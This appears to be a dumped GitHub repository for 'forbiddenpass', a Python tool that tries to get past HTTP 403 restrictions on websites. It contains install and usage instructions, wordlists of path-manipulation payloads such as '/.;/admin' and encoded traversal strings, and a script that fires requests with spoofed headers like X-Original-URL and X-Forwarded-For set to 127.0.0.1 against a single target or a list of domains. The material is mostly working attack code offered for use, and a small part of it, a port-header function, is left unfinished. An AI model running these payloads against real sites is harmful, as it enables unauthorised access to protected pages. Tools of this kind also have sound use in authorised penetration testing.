[
  {
    "path": "README.md",
    "content": "# UPDATE \n\nThanks to Knowledge-Wisdom-Understanding (MrPMillz) for making the script cleaner and fixing the header payloads.\n\n# INSTALLATION\n\n```bash\n\ngit clone https://github.com/gotr00t0day/forbiddenpass.git\n\ncd forbiddenpass\n\npip3 install -r requirements.txt\n\npython3 forbiddenpass.py -h\n\n```\n\n# USAGE \n\n```bash\n\n___________         ___.   .__    .___  .___           __________                                        \n\\_   _____/_________\\_ |__ |__| __| _/__| _/____   ____\\______   \\_____    ______ ______                 \n |    __)/  _ \\_  __ \\ __ \\|  |/ __ |/ __ |/ __ \\ /    \\|     ___/\\__  \\  /  ___//  ___/                 \n |     \\(  <_> )  | \\/ \\_\\ \\  / /_/ / /_/ \\  ___/|   |  \\    |     / __ \\_\\___ \\ \\___ \\                  \n \\___  / \\____/|__|  |___  /__\\____ \\____ |\\___  >___|  /____|    (____  /____  >____  >                 \n     \\/                  \\/        \\/    \\/    \\/     \\/               \\/     \\/     \\/   v1.0           \n                                                                                                         \n                                                                                                         \n                                                                                                         \nusage: forbiddenpass.py [-h] [-p domain.com] [-d filename.txt] [-t site.com]                             \n                                                                                                         \noptional arguments:                                                                                      \n  -h, --help            show this help message and exit                                                  \n  -p domain.com, --path domain.com                                                                       \n                        path to check                                                                    \n  
-d filename.txt, --domains filename.txt                                                                \n                        domains to check                                                                 \n  -t site.com, --target site.com                                                                         \n                        domain to check \n ```\n \n # EXAMPLE\n \n domains to check\n ```\n python3 forbiddenpass.py -d domains.txt\n ```\n domains to check with a path\n ```\n python3 forbiddenpass.py -d domains.txt --path login\n ```\n scan a single target\n ```\n python3 forbiddenpass.py -t https://site\n ```\n scan a single target with a path\n ```\n  python3 forbiddenpass.py -t https://site --path login\n ```\n\n# DISCLAIMER\n\nInspired by https://github.com/iamj0ker/bypass-403 <br>\nbypass-403 doesn't support scanning multiple domains, and I needed to speed things up a bit, so forbiddenpass was created.\n"
  },
  {
    "path": "admin.txt",
    "content": "/accessible/..;/admin\n/.;/admin\n/admin;/\n/admin/~\n/./admin/./\n/admin?param\n/%2e/admin\n/admin#\n"
  },
  {
    "path": "bypasses.txt",
    "content": "/\n/%2e/\n//.\n////\n/.//./\n/.;/\n/%20\n/../\n%09\n%20\n%%%%20\n%%%%23%%%%3f\n%%%%252f%%%%252f\n%%%%252f/\n%%%%2e%%%%2e\n%%%%2e%%%%2e/\n%%%%2f\n%%%%2f%%%%20%%%%23\n"
  },
  {
    "path": "forbiddenpass.py",
    "content": "from colorama import Fore, Back, Style\nfrom fake_useragent import UserAgent\nimport concurrent.futures\nimport requests\nimport argparse\nimport sys\nimport json\n\nbanner = r\"\"\"\n\n\n___________         ___.   .__    .___  .___           __________\n\\_   _____/_________\\_ |__ |__| __| _/__| _/____   ____\\______   \\_____    ______ ______\n |    __)/  _ \\_  __ \\ __ \\|  |/ __ |/ __ |/ __ \\ /    \\|     ___/\\__  \\  /  ___//  ___/\n |     \\(  <_> )  | \\/ \\_\\ \\  / /_/ / /_/ \\  ___/|   |  \\    |     / __ \\_\\___ \\ \\___ \\\n \\___  / \\____/|__|  |___  /__\\____ \\____ |\\___  >___|  /____|    (____  /____  >____  >\n     \\/                  \\/        \\/    \\/    \\/     \\/               \\/     \\/     \\/   v1.1\nby c0d3Ninja, MrPMillz\n\n\"\"\"\n\nprint(Fore.CYAN + banner)\n\nparser = argparse.ArgumentParser()\ngroup = parser.add_mutually_exclusive_group()\n\ngroup.add_argument('-p', '--path', action='store',\n                   type=str, help='path to check',\n                   metavar='domain.com')\n\nparser.add_argument('-d', '--domains', action='store',\n                    help=\"domains to check\",\n                    metavar=\"filename.txt\")\n\nparser.add_argument('-t', '--target', action='store',\n                    help=\"domain to check\",\n                    metavar=\"site.com\")\n\nargs = parser.parse_args()\n\nua = UserAgent()\n\n\ndef word_list(wordlist: str) -> list:\n    try:\n        with open(wordlist, 'r') as f:\n            _wordlist = [x.strip() for x in f.readlines()]\n        return _wordlist\n    except FileNotFoundError as fnf_err:\n        print(f\"FileNotFoundError: {fnf_err}\")\n        sys.exit(1)\n\nwordlist = word_list(\"bypasses.txt\")\n\n\ndef header_bypass(path=None):\n    headers = [\n        {'User-Agent': str(ua.chrome)},\n        {'User-Agent': str(ua.chrome), 'X-Original-URL': path if path else '/'},\n        {'User-Agent': str(ua.chrome), 'X-Custom-IP-Authorization': 
'127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-For': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-For': '127.0.0.1:80'},\n        {'User-Agent': str(ua.chrome), 'X-Originally-Forwarded-For': '127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Originating-': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Originating-IP': '127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'True-Client-IP': '127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-WAP-Profile': '127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Arbitrary': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-HTTP-DestinationURL': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-Proto': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'Destination': '127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Remote-IP': '127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Client-IP': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Host': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-Host': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-ProxyUser-Ip': '127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-rewrite-url': path if path else '/'}\n    ]\n    return headers\n\ndef port_based_bypass(path=None):\n    headers = [\n        {'User-Agent': str(ua.chrome)},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '4443'},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '80'},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '8080'},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '8443'}\n    ]\n\ndef do_request(url: str, stream=False, path=None):\n    if path:\n        headers = header_bypass(path=path)\n    else:\n        headers = header_bypass()\n    try:\n        for header in headers:\n            if stream:\n                r = requests.get(url, stream=True, 
headers=header)\n            else:\n                r = requests.get(url, headers=header)\n            if r.status_code == 200:\n                print(Fore.WHITE + url + ' ' + json.dumps(list(header.items())[-1]) + Fore.GREEN + \" [{}]\".format(r.status_code))\n            else:\n                print(Fore.WHITE + url + ' ' + json.dumps(list(header.items())[-1]) + Fore.RED + \" [{}]\".format(r.status_code))\n    except requests.exceptions.ConnectionError as ce_error:\n        pass\n    except requests.exceptions.Timeout as t_error:\n        print(\"Connection Timeout Error: \", t_error)\n        pass\n    except requests.exceptions.RequestException as req_err:\n        print(\"Some Ambiguous Exception:\", req_err)\n        pass\n\n\ndef main(wordlist):\n    if args.domains:\n        if args.path:\n            print(Fore.CYAN + \"Checking domains to bypass....\")\n            checklist = word_list(args.domains)\n            for lines in checklist:\n                for bypass in wordlist:\n                    links = lines + \"/\" + args.path + bypass\n                    do_request(links, stream=True, path=args.path)\n        else:\n            print(Fore.CYAN + \"Checking domains to bypass....\")\n            checklist = word_list(args.domains)\n            for lines in checklist:\n                for bypass in wordlist:\n                    links = lines + bypass\n                    do_request(links, stream=True)\n    if args.target:\n        if args.path:\n            print(Fore.GREEN + f\"Checking {args.target}...\")\n            for bypass in wordlist:\n                links = args.target + \"/\" + args.path + bypass\n                do_request(links, path=args.path)\n\n        else:\n            print(Fore.GREEN + f\"Checking {args.target}...\")\n            for bypass in wordlist:\n                links = args.target + bypass\n                do_request(links)\n\nif __name__ == \"__main__\":\n    try:\n        with concurrent.futures.ThreadPoolExecutor() as 
executor:\n            executor.map(main, wordlist)\n    except KeyboardInterrupt as err:\n        sys.exit(0)\n"
  },
  {
    "path": "requirements.txt",
    "content": "colorama\nrequests\nfake-useragent\nargparse\n"
  }
]